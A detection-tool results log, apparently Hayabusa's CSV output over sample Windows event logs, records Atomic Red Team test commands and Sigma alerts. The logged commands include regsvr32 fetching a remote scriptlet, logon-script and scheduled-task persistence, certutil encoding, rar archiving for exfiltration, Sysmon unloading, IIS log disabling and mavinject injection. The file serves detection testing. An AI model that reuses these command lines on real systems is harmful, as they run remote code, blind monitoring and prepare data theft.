2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c  IF %%PROCESSOR_ARCHITECTURE%% ==AMD64  ELSE    :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command:  /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll  :  Path: C:\Windows\SysWOW64\regsvr32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe  ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d  cmd.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -encode c:\file.exe file.txt  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -decode file.txt c:\file.exe  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp  -decode c:\file.exe file.txt  :  Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll  :  Path: C:\Windows\System32\mavinject.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT  :  Command: at  13:20 /interactive cmd  :  Path: C:\Windows\System32\at.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
